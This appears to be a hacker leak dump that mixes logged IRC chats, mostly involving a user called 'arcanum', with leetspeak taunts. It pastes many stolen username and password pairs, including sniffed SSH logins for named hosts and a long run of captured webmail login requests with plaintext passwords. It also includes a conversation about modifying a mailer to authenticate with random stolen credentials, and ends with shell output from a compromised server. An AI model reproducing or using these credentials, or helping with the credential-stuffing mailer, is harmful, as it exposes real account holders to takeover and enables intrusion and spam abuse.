[SEND_MSG] [10:46pm] - arcanum is the glass 1/2 full or 1/2 empty \;
[MSGS ] [10:46pm] - arcanum arc@mall.pulltheplug.com havent had control for 3 years
[SEND_MSG] [10:47pm] - arcanum how long do you have to wait to find out what the story is ?
[MSGS ] [10:47pm] - arcanum arc@mall.pulltheplug.com i dont know
[MSGS ] [10:47pm] - arcanum arc@mall.pulltheplug.com supposably
[MSGS ] [10:47pm] - arcanum arc@mall.pulltheplug.com this next court date
[MSGS ] [10:47pm] - arcanum arc@mall.pulltheplug.com is final one
[MSGS ] [10:47pm] - arcanum arc@mall.pulltheplug.com april 12th
[SEND_MSG] [10:47pm] - arcanum ahh
[SEND_MSG] [10:47pm] - arcanum hrmm
[SEND_MSG] [10:47pm] - arcanum what do you think the likely outcome will be ?
[MSGS ] [10:47pm] - arcanum arc@mall.pulltheplug.com i'll goto federal prison for 6 months to a year
[MSGS ] [10:47pm] - arcanum arc@mall.pulltheplug.com which isnt bad
[MSGS ] [10:48pm] - arcanum arc@mall.pulltheplug.com compared to the 20 years i should be doing
[MSGS ] [10:48pm] - arcanum arc@mall.pulltheplug.com not to mention the boatload of relevant conduct
[MSGS ] [10:48pm] - arcanum arc@mall.pulltheplug.com i'll prolly end up having to pay 80k-100k in restitution
[MSGS ] [10:48pm] - arcanum arc@mall.pulltheplug.com over the course of the rest of my life
[SEND_MSG] [10:48pm] - arcanum thats not 'that' much
[SEND_MSG] [10:49pm] - arcanum what happens after that 6months-year ?
[SEND_MSG] [10:49pm] - arcanum you free to do what you want ?
[MSGS ] [10:49pm] - arcanum arc@mall.pulltheplug.com no
[MSGS ] [10:49pm] - arcanum arc@mall.pulltheplug.com i'm on probation for another 5 years after that
[SEND_MSG] [10:50pm] - arcanum like no computers probation or just dont get in trouble again probation ?
[MSGS ] [10:51pm] - arcanum arc@mall.pulltheplug.com not sure
[MSGS ] [10:51pm] - arcanum arc@mall.pulltheplug.com but i'm pretty sure
[MSGS ] [10:51pm] - arcanum arc@mall.pulltheplug.com the judge will let me use computers
[MSGS ] [10:52pm] - arcanum arc@mall.pulltheplug.com this sucks so bad still
[MSGS ] [10:52pm] - arcanum arc@mall.pulltheplug.com even after 3 years
[MSGS ] [10:52pm] - arcanum arc@mall.pulltheplug.com heh
[MSGS ] [10:52pm] - arcanum arc@mall.pulltheplug.com dont know where people like PD get off thinking my life is just the same as before
[MSGS ] [10:52pm] - arcanum arc@mall.pulltheplug.com where i have a job and everything
[MSGS ] [10:52pm] - arcanum arc@mall.pulltheplug.com ...
[MSGS ] [10:52pm] - arcanum arc@mall.pulltheplug.com not even close to the truth
[SEND_MSG] [10:53pm] - arcanum ya
[SEND_MSG] [10:53pm] - arcanum hrmm
[SEND_MSG] [10:53pm] - arcanum maybe its time to find a new hobby
[SEND_MSG] [10:53pm] - arcanum away from the pc ?
[MSGS ] [10:54pm] - arcanum arc@mall.pulltheplug.com yea maybe i should take up gardening
[SEND_MSG] [10:54pm] - arcanum plenty of other things out there
[SEND_MSG] [10:55pm] - arcanum maybe find something new
[SEND_MSG] [10:55pm] - arcanum that will motivate you again
[MSGS ] [10:55pm] - arcanum arc@mall.pulltheplug.com honestly i odnt know wtf i'm going to do
[MSGS ] [10:55pm] - arcanum arc@mall.pulltheplug.com hopefully things will be ore clear when i get sentenced
[MSGS ] [10:55pm] - arcanum arc@mall.pulltheplug.com i'll be able to say
[MSGS ] [10:55pm] - arcanum arc@mall.pulltheplug.com "ok 6 years and i'll be free again"
[MSGS ] [10:55pm] - arcanum arc@mall.pulltheplug.com =\
[MSGS ] [10:55pm] - arcanum arc@mall.pulltheplug.com "6 years and i'll be able to do xyz again"
[SEND_MSG] [10:56pm] - arcanum 6 years is a long time
[SEND_MSG] [10:56pm] - arcanum do you want to be back where you started in 6 years time ?
[SEND_MSG] [10:56pm] - arcanum probably not..
[SEND_MSG] [10:56pm] - arcanum maybe if you do go in for 6 months
[MSGS ] [10:56pm] - arcanum arc@mall.pulltheplug.com i wont have a choice
[MSGS ] [10:56pm] - arcanum arc@mall.pulltheplug.com well
[SEND_MSG] [10:56pm] - arcanum use htat time to un-addict your self
[MSGS ] [10:56pm] - arcanum arc@mall.pulltheplug.com i figure
[MSGS ] [10:56pm] - arcanum arc@mall.pulltheplug.com 6 months
[SEND_MSG] [10:56pm] - arcanum then you cna start fresh
[MSGS ] [10:57pm] - arcanum arc@mall.pulltheplug.com when i get out
[SEND_MSG] [10:57pm] - arcanum with ideas
[MSGS ] [10:57pm] - arcanum arc@mall.pulltheplug.com for another 6 months i'll be still controlled
[MSGS ] [10:57pm] - arcanum arc@mall.pulltheplug.com after that
[MSGS ] [10:57pm] - arcanum arc@mall.pulltheplug.com things will be lax enough for me to be able to do what i want
[MSGS ] [10:57pm] - arcanum arc@mall.pulltheplug.com again
[MSGS ] [10:57pm] - arcanum arc@mall.pulltheplug.com i'm not really addicted
[SEND_MSG] [10:57pm] - arcanum find a woman
[SEND_MSG] [10:57pm] - arcanum theres a start
[MSGS ] [10:57pm] - arcanum arc@mall.pulltheplug.com i just have simply nothing else to do with my time
[MSGS ] [10:57pm] - arcanum arc@mall.pulltheplug.com wish it was that easy
[SEND_MSG] [10:58pm] - arcanum well wait the 6 months then before you start looking im guessing heh
[MSGS ] [10:58pm] - arcanum arc@mall.pulltheplug.com lol
[MSGS ] [10:58pm] - arcanum arc@mall.pulltheplug.com i'm going to be 23
[MSGS ] [10:58pm] - arcanum arc@mall.pulltheplug.com this november
[MSGS ] [10:58pm] - arcanum arc@mall.pulltheplug.com 23 and i have nothing to show for myself
[MSGS ] [10:59pm] - arcanum arc@mall.pulltheplug.com no car
[MSGS ] [10:59pm] - arcanum arc@mall.pulltheplug.com no money
[MSGS ] [10:59pm] - arcanum arc@mall.pulltheplug.com no job
[MSGS ] [10:59pm] - arcanum arc@mall.pulltheplug.com if my mom told me
[SEND_MSG] [10:59pm] - arcanum you need to stop thinking about everyone else
[MSGS ] [10:59pm] - arcanum arc@mall.pulltheplug.com "get the fuck out of my house"
[SEND_MSG] [10:59pm] - arcanum and think about yourself
[MSGS ] [10:59pm] - arcanum arc@mall.pulltheplug.com i'd own nothing

TH1Z 1Z 0UR G1FT T0 MRX F0R H1Z N3XT B00K.


[SEND_MSG] [11:58am] - #vortex ssh -l root james.kalifornia.com
[SEND_MSG] [11:58am] - #vortex /lib/
[SEND_MSG] [11:59am] - #vortex or /usr/lib
[SEND_MSG] [11:59am] - #vortex one of the 2
[SEND_MSG] [11:59am] - #vortex dude
[SEND_MSG] [11:59am] - #vortex i know a lot more
[SEND_MSG] [11:59am] - #vortex than people give me credit for
[SEND_MSG] [11:59am] - #vortex i just dont go and talk shit
[SEND_MSG] [11:59am] - #vortex like msot
[SEND_MSG] [12:00pm] - #vortex root@ns.linux.com's password: Huntington
[SEND_MSG] [12:00pm] - #vortex shrug
[SEND_MSG] [12:04pm] - #vortex jessi:netPo90Afrika$n@q.arc.nasa.gov
[SEND_MSG] [12:04pm] - #vortex raquele:netPo90Afrika$n@q.arc.nasa.gov
[SEND_MSG] [12:04pm] - #vortex petermc:wyei$7@petermc.lbl.gov
[SEND_MSG] [12:04pm] - #vortex raquele:netPo99Afrika$n@q.arc.nasa.gov
[SEND_MSG] [12:04pm] - #vortex gobridge:2Sxnv470@shell3.ba.best.com
[SEND_MSG] [12:04pm] - #vortex petermc:wyei$7@petermc.lbl.gov
[SEND_MSG] [12:04pm] - #vortex shrug
[SEND_MSG] [12:04pm] - #vortex want intel.com ?
[SEND_MSG] [12:04pm] - #vortex microsoft.com
[SEND_MSG] [12:04pm] - #vortex you name it
[SEND_MSG] [12:04pm] - #vortex come 1999
[SEND_MSG] [12:04pm] - #vortex i had most shit
[SEND_MSG] [12:04pm] - #vortex around
[SEND_MSG] [12:04pm] - #vortex unlike most people tho
[SEND_MSG] [12:04pm] - #vortex i kept to my self
[SEND_MSG] [12:05pm] - #vortex and didnt past shit like that
[SEND_MSG] [12:05pm] - #vortex in chans
[SEND_MSG] [12:05pm] - #vortex and ge fucked up
[SEND_MSG] [12:05pm] - #vortex get*
[SEND_MSG] [12:05pm] - #vortex i played dumb
[SEND_MSG] [12:05pm] - #vortex shrug
[SEND_MSG] [12:05pm] - #vortex 2 secs
[SEND_MSG] [12:07pm] - #vortex lol
[SEND_MSG] [12:08pm] - #vortex but the book is going to take a while to write
[SEND_MSG] [12:08pm] - #vortex he might be done by then
[SEND_MSG] [12:08pm] - #vortex remember this xt ?
[SEND_MSG] [12:08pm] - #vortex username = likwid9
[SEND_MSG] [12:08pm] - #vortex passwd = jedl8CP
[SEND_MSG] [12:08pm] - #vortex Compaq's Tru64 Unix 4.0d (JAVA) AS1200 2@533MHz (ev56) telnet to
[SEND_MSG] [12:08pm] - #vortex 192.233.54.145
[SEND_MSG] [12:08pm] - #vortex Debian 2.1 Linux on Intel Proliant 4@200MHz telnet to 192.
[SEND_MSG] [12:08pm] - #vortex 233.54.143
[SEND_MSG] [12:08pm] - #vortex Redhat 6.2 Linux on Alpha DS20 2@500MHz (ev6) telnet to 192.
[SEND_MSG] [12:08pm] - #vortex ... etc
[SEND_MSG] [12:09pm] - #vortex xt got owned ?!

S0 D1D Y0U, Y0U DUMB FUQN CUNT. H3LLM4N + XT = B1GG3ZT M0UTHZ 1N H4Q1NG.

"WANT ROOT ON FNORD.IO.COM?" XT - 2006

1Z TH4T TH3 0NLY B0X Y0U FUQN L4M3RZ H4V3 3V3R R00T3D???

[MSGS ] [03:47pm] - arcanum arc@mall.pulltheplug.com stupid politics
[SEND_MSG] [03:48pm] - arcanum what provoked it ?
[SEND_MSG] [03:49pm] - arcanum <Josh> just cos i hate you arc
[SEND_MSG] [03:49pm] - arcanum <Josh> doesnt mean i hate the network
[SEND_MSG] [03:49pm] - arcanum someting between u and josh i take it
[MSGS ] [03:49pm] - arcanum arc@mall.pulltheplug.com so irritating
[MSGS ] [03:49pm] - arcanum arc@mall.pulltheplug.com yea
[MSGS ] [03:49pm] - arcanum arc@mall.pulltheplug.com he's mad i pretty much run ptp
[MSGS ] [03:50pm] - arcanum arc@mall.pulltheplug.com so he provoked a fight
[MSGS ] [03:50pm] - arcanum arc@mall.pulltheplug.com riled up a bunch of people

PLZ H4Q ARC4NUM.


[SEND_MSG] [05:46pm] - arcanum mel:Pearljam@shell.one.net
[SEND_MSG] [05:47pm] - arcanum queerskin:guinness@queernet.org
[SEND_MSG] [05:47pm] - arcanum zillah:treakle732@feeding.frenzy.com
[SEND_MSG] [05:47pm] - arcanum raquele:netPo99Afrika$n@q.arc.nasa.gov
[SEND_MSG] [05:47pm] - arcanum gobridge:2Sxnv470@shell3.ba.best.com
[SEND_MSG] [05:47pm] - arcanum petermc:wyei$7@petermc.lbl.gov
[SEND_MSG] [05:47pm] - arcanum gobridge:u!V3zU7i@shell3.ba.best.com
[SEND_MSG] [05:47pm] - arcanum mel:Pearljam@shell.one.net
[SEND_MSG] [05:47pm] - arcanum jessi:netPo90Afrika$n@q.arc.nasa.gov
[SEND_MSG] [05:47pm] - arcanum raquele:netPo90Afrika$n@q.arc.nasa.gov
[SEND_MSG] [05:47pm] - arcanum petermc:wyei$7@petermc.lbl.gov
[SEND_MSG] [05:47pm] - arcanum
[SEND_MSG] [05:47pm] - arcanum
[SEND_MSG] [05:47pm] - arcanum they be all ssh sniff logs from fnord.io


[MSGS ] [06:01pm] - arcanum arc@mall.pulltheplug.com yea that's eris
[SEND_MSG] [06:01pm] - arcanum [SEND_MSG] [08:08pm] - #hellman sv@smoke.dope.org's password: : sm00ti3
[SEND_MSG] [06:01pm] - arcanum [SEND_MSG] [08:08pm] - #hellman queerskin@queernet.org's password: : AbuNuwas
[SEND_MSG] [06:01pm] - arcanum [SEND_MSG] [08:08pm] - #hellman jdunson@miyu.cc.vt.edu's password: : Vamp4C0w
[SEND_MSG] [06:01pm] - arcanum [SEND_MSG] [08:08pm] - #hellman peery@password.io.com's password: : admin.io
[SEND_MSG] [06:01pm] - arcanum [SEND_MSG] [08:08pm] - #hellman heh
[MSGS ] [06:02pm] - arcanum arc@mall.pulltheplug.com dope.org
[SEND_MSG] [06:02pm] - arcanum
[SEND_MSG] [06:02pm] - arcanum
[SEND_MSG] [06:02pm] - arcanum mdfranz@ssh.cisco.com's password: : l1nxrl2999
[SEND_MSG] [06:02pm] - arcanum
[SEND_MSG] [06:02pm] - arcanum h0 h0
[MSGS ] [06:02pm] - arcanum arc@mall.pulltheplug.com ROTLFMOA
[MSGS ] [06:02pm] - arcanum arc@mall.pulltheplug.com that was from eris
[SEND_MSG] [06:02pm] - arcanum [SEND_MSG] [08:08pm] - #hellman kndn@atlantis.io.com's password: : Knencv9*
[SEND_MSG] [06:02pm] - arcanum [SEND_MSG] [08:08pm] - #hellman peery@password.io.com's password: : admin.io
[SEND_MSG] [06:02pm] - arcanum [SEND_MSG] [08:08pm] - #hellman mdfranz@ssh.cisco.com's password: : l1nxrl2999

PTP, 3TH1C4L H4Q1NG.


[SEND_MSG] [04:09pm] - #social SPAM > *
[SEND_MSG] [04:09pm] - #social !!!!!!!!!!
[SEND_MSG] [04:10pm] - #social arcanum woulda got PAID if he could finish jobs.. \;
[SEND_MSG] [04:19pm] - #social i got more work
[SEND_MSG] [04:19pm] - #social if you were interested
[SEND_MSG] [04:19pm] - #social coding work i cant be bothered with
[SEND_MSG] [04:19pm] - #social mods to existing apps
[SEND_MSG] [04:20pm] - #social yes
[SEND_MSG] [04:20pm] - #social just .c
[SEND_MSG] [04:20pm] - #social apps are basic enoguh
[SEND_MSG] [04:21pm] - arcanum example
[SEND_MSG] [04:21pm] - arcanum :
[SEND_MSG] [04:21pm] - arcanum i got a linux mailer
[SEND_MSG] [04:21pm] - arcanum pretty clean code
[SEND_MSG] [04:21pm] - arcanum w/ normal smtp protocl shit
[SEND_MSG] [04:21pm] - arcanum e.g.
[SEND_MSG] [04:21pm] - arcanum helo world
[SEND_MSG] [04:21pm] - arcanum rcpt from: blah@blah.com
[SEND_MSG] [04:21pm] - arcanum mail to: shit@shit.com
[SEND_MSG] [04:21pm] - arcanum data
[SEND_MSG] [04:22pm] - arcanum asdf asoif oaish dfoaih dfh fhsdoiadf
[SEND_MSG] [04:22pm] - arcanum .
[SEND_MSG] [04:22pm] - arcanum orwhatever the noral smtp protocol is
[MSGS ] [04:22pm] - arcanum arc@mall.pulltheplug.com ok
[SEND_MSG] [04:22pm] - arcanum need to change it to
[SEND_MSG] [04:22pm] - arcanum helo world
[SEND_MSG] [04:22pm] - arcanum user: loginname
[SEND_MSG] [04:22pm] - arcanum pass: password
[SEND_MSG] [04:22pm] - arcanum rcpt from: blah@blah.com
[SEND_MSG] [04:22pm] - arcanum mail to: shit@shit.com
[SEND_MSG] [04:22pm] - arcanum data
[SEND_MSG] [04:22pm] - arcanum rest as per norm
[MSGS ] [04:22pm] - arcanum arc@mall.pulltheplug.com that's a pretty easy change
[MSGS ] [04:23pm] - arcanum arc@mall.pulltheplug.com where is username / pass specified
[MSGS ] [04:23pm] - arcanum arc@mall.pulltheplug.com command line?
[SEND_MSG] [04:23pm] - arcanum just gotta read in a random l/p combo from a external file
[MSGS ] [04:23pm] - arcanum arc@mall.pulltheplug.com config file?
[MSGS ] [04:23pm] - arcanum arc@mall.pulltheplug.com nod
[MSGS ] [04:23pm] - arcanum arc@mall.pulltheplug.com not difficult
[MSGS ] [04:23pm] - arcanum arc@mall.pulltheplug.com the application threaded?
[SEND_MSG] [04:23pm] - arcanum yes
[SEND_MSG] [04:23pm] - arcanum code is pretty straight forward i think from me looking at it
[MSGS ] [04:24pm] - arcanum arc@mall.pulltheplug.com yea
[MSGS ] [04:24pm] - arcanum arc@mall.pulltheplug.com how large
[MSGS ] [04:24pm] - arcanum arc@mall.pulltheplug.com is the external file?
[SEND_MSG] [04:24pm] - arcanum i duno .. anywhere from a few hundred to a few thousand
[SEND_MSG] [04:24pm] - arcanum just read in a random one
[MSGS ] [04:24pm] - arcanum arc@mall.pulltheplug.com lines?
[MSGS ] [04:24pm] - arcanum arc@mall.pulltheplug.com nod
[SEND_MSG] [04:25pm] - arcanum yes 1 per line
[SEND_MSG] [04:25pm] - arcanum however you want the format
[SEND_MSG] [04:25pm] - arcanum like
[SEND_MSG] [04:25pm] - arcanum user:pass
[SEND_MSG] [04:25pm] - arcanum or whatever doesnt matter
[MSGS ] [04:25pm] - arcanum arc@mall.pulltheplug.com nod
[MSGS ] [04:25pm] - arcanum arc@mall.pulltheplug.com just like
[MSGS ] [04:25pm] - arcanum arc@mall.pulltheplug.com a function
[MSGS ] [04:25pm] - arcanum arc@mall.pulltheplug.com than opens the file
[MSGS ] [04:25pm] - arcanum arc@mall.pulltheplug.com jumps to a random line
[MSGS ] [04:25pm] - arcanum arc@mall.pulltheplug.com reads user:pass into an array
[SEND_MSG] [04:25pm] - arcanum ya
[MSGS ] [04:25pm] - arcanum arc@mall.pulltheplug.com then uses them
[MSGS ] [04:25pm] - arcanum arc@mall.pulltheplug.com well
[SEND_MSG] [04:25pm] - arcanum probably on init() load them all into memory and then call a random one from memory when u actually sendmail()
[SEND_MSG] [04:25pm] - arcanum or some shit
[SEND_MSG] [04:26pm] - arcanum save opening the file 23983289 times a second
[MSGS ] [04:26pm] - arcanum arc@mall.pulltheplug.com that's possible too
[MSGS ] [04:26pm] - arcanum arc@mall.pulltheplug.com alot of memory might be used up though
[MSGS ] [04:26pm] - arcanum arc@mall.pulltheplug.com i mean i could allocate it on the fly
[SEND_MSG] [04:27pm] - arcanum its only like 1000 l/p combos to store in memory.. that cant be that much can it ?
[MSGS ] [04:27pm] - arcanum arc@mall.pulltheplug.com ah
[MSGS ] [04:27pm] - arcanum arc@mall.pulltheplug.com so it's a static number of entries?
[SEND_MSG] [04:27pm] - arcanum yeah
[SEND_MSG] [04:27pm] - arcanum in a .txt
[MSGS ] [04:27pm] - arcanum arc@mall.pulltheplug.com would there ever be more than 1000 ?
[SEND_MSG] [04:27pm] - arcanum well make it max 5000 or something
[SEND_MSG] [04:27pm] - arcanum *shrug*
[MSGS ] [04:27pm] - arcanum arc@mall.pulltheplug.com yea
[MSGS ] [04:28pm] - arcanum arc@mall.pulltheplug.com if it wasn that
[MSGS ] [04:28pm] - arcanum arc@mall.pulltheplug.com then i could like
[MSGS ] [04:28pm] - arcanum arc@mall.pulltheplug.com make it a static array
[SEND_MSG] [04:28pm] - arcanum list is static
[MSGS ] [04:28pm] - arcanum arc@mall.pulltheplug.com smaller function
[MSGS ] [04:28pm] - arcanum arc@mall.pulltheplug.com less calls
[SEND_MSG] [04:28pm] - arcanum might change once a week or so
[MSGS ] [04:28pm] - arcanum arc@mall.pulltheplug.com to malloc
[SEND_MSG] [04:30pm] - arcanum that something that sounds like you could be intersetd in ?
[MSGS ] [04:31pm] - arcanum arc@mall.pulltheplug.com sure
[MSGS ] [04:31pm] - arcanum arc@mall.pulltheplug.com i mean
[SEND_MSG] [04:31pm] - arcanum do you have time to do this is another thing
[MSGS ] [04:31pm] - arcanum arc@mall.pulltheplug.com i dont need the src as of right now
[MSGS ] [04:31pm] - arcanum arc@mall.pulltheplug.com i can work ont he function
[MSGS ] [04:31pm] - arcanum arc@mall.pulltheplug.com is it functionalized?
[MSGS ] [04:31pm] - arcanum arc@mall.pulltheplug.com is there an init() ?
[SEND_MSG] [04:31pm] - arcanum i can give you the source
[SEND_MSG] [04:31pm] - arcanum thats no probs
[MSGS ] [04:32pm] - arcanum arc@mall.pulltheplug.com who wrote it for you?
[SEND_MSG] [04:32pm] - arcanum you just cnat hand out the source to anyone else
[SEND_MSG] [04:33pm] - arcanum kinda arrangement
[MSGS ] [04:33pm] - arcanum arc@mall.pulltheplug.com yea
[MSGS ] [04:33pm] - arcanum arc@mall.pulltheplug.com i dont do that
[MSGS ] [04:33pm] - arcanum arc@mall.pulltheplug.com heh
[SEND_MSG] [04:33pm] - arcanum www.kas.net.au/far/far.zip
[MSGS ] [04:33pm] - arcanum arc@mall.pulltheplug.com sec
[MSGS ] [04:34pm] - arcanum arc@mall.pulltheplug.com k
[MSGS ] [04:35pm] - arcanum arc@mall.pulltheplug.com got it
[SEND_MSG] [04:35pm] - arcanum k run it and it spawns a local web interface as well
[SEND_MSG] [04:35pm] - arcanum default on port 8080
[SEND_MSG] [04:35pm] - arcanum so go to http://ip:8080/
[SEND_MSG] [04:35pm] - arcanum and u can see how it works
[SEND_MSG] [04:35pm] - arcanum pretty straight forward
[MSGS ] [04:35pm] - arcanum arc@mall.pulltheplug.com mofo is using host by name
[MSGS ] [04:35pm] - arcanum arc@mall.pulltheplug.com if ((hp = gethostbyname(host)) == NULL) return (ARESOLVE);
[MSGS ] [04:35pm] - arcanum arc@mall.pulltheplug.com wtf
[MSGS ] [04:35pm] - arcanum arc@mall.pulltheplug.com ..
[MSGS ] [04:36pm] - arcanum arc@mall.pulltheplug.com that's not thread safe
[MSGS ] [04:36pm] - arcanum arc@mall.pulltheplug.com is this thing fast?
[SEND_MSG] [04:36pm] - arcanum yes
[MSGS ] [04:36pm] - arcanum arc@mall.pulltheplug.com interesting
[MSGS ] [04:36pm] - arcanum arc@mall.pulltheplug.com ok
[MSGS ] [04:36pm] - arcanum arc@mall.pulltheplug.com well
[MSGS ] [04:36pm] - arcanum arc@mall.pulltheplug.com i guess you have your reasons












  
de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=fundjquaak@verein-mediacom.de&pass=vegetarisch&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=fundjquaak@verein-mediacom.de&pass=vegetarisch&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=andre@i-baum.de&pass=techido&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=Sebo%40moshpit.de&pass=23Stirb&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Log+in
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=Sebo%40moshpit.de&pass=23Stirb&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Log+in
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=Sebo%40moshpit.de&pass=23Stirb&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=en_US&button=Log+in
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=mail@lars-lehmann.com&pass=gmodell&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=info@vfm-service.de&pass=moppel&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=info%40queerbeet-lg.de&pass=homoehe&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=info@4pfoten-online.de&pass=tomphil&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=mail@lars-lehmann.com&pass=dgmodell&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=Sebo%40moshpit.de&pass=23Stirb&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Log+in
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=Sebo%40moshpit.de&pass=23Stirb&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Log+in
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=Sebo%40moshpit.de&pass=23Stirb&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=en_US
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=Sebo%40moshpit.de&pass=23Stirb&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Log+in
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=info@aegidius-choere.de&pass=konzert&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=info%40queerbeet-lg.de&pass=homoehe&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=info%40queerbeet-lg.de&pass=homoehe&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=info%40queerbeet-lg.de&pass=homoehe&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=info%40queerbeet-lg.de&pass=homoehe&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=mail@lars-lehmann.com&pass=gmodell&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=mail@lars-lehmann.com&pass=gmodell&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=ralf%40duddek.de&pass=Post.3D&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=julian%40echoes-online.de&pass=stuh2s&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=en_US&button=Log+in
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=julian%40echoes-online.de&pass=stuh2s&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=en_US&button=Log+in
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=info%40christopher-kunz.de&pass=Satan666&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=en_US
webby:/var/log/httpd# buahahaha
bash: buahahaha: command not found
webby:/var/log/httpd# cd ~/.ssh/
webby:~/.ssh# cat known_hosts
